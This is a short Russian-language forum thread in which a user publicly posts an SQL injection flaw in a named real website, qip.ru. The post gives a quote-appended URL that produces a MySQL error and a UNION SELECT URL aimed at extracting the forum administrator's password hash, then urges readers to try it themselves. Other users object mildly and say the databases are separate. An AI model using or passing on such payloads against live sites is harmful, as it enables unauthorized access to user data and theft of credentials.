qip.ru

[Great]

SQL-Injection на qip.ru
Добрые разработчики движка этого сайта оставили место где можно разгуляться хакерам. На сайте qip.ru обнаружена уязвимость класса sql-injection.
Запрос выглядит так:

http://www.qip.ru/qa/index.php?cat=1%27

На что скрипт отвечает:

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/q/qipru/public_html/qa/includes/core.inc.php on line 221
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND (IFNULL(c.active, 'Y') = 'Y' AND IFNULL(q.active, 'Y' at line 5

Я попытался составить запрос для получения хеша пароля администратора с их форума, но он не работает
(я сделал так:

http://www.qip.ru/qa/index.php?cat=-1%20union%20select member_login_key from ibf_members where id=1 /*

)
Возможно, у меня просто не хватило терпения перебрать кол-во колонок результата =)

Вообщем, дерзайте!

 

[Ushiro]

Нехорошо ломать qip :o :nono:

 

[Winux]

БД ворума и БД сайта разные, вот и не вышло. И ваще, руки прочь от квипа. Пусть будет)

 

[nerezus]

но ошибка необычайно тупая...

 

[Great]

nerezus
Winux
ойой =) точно =)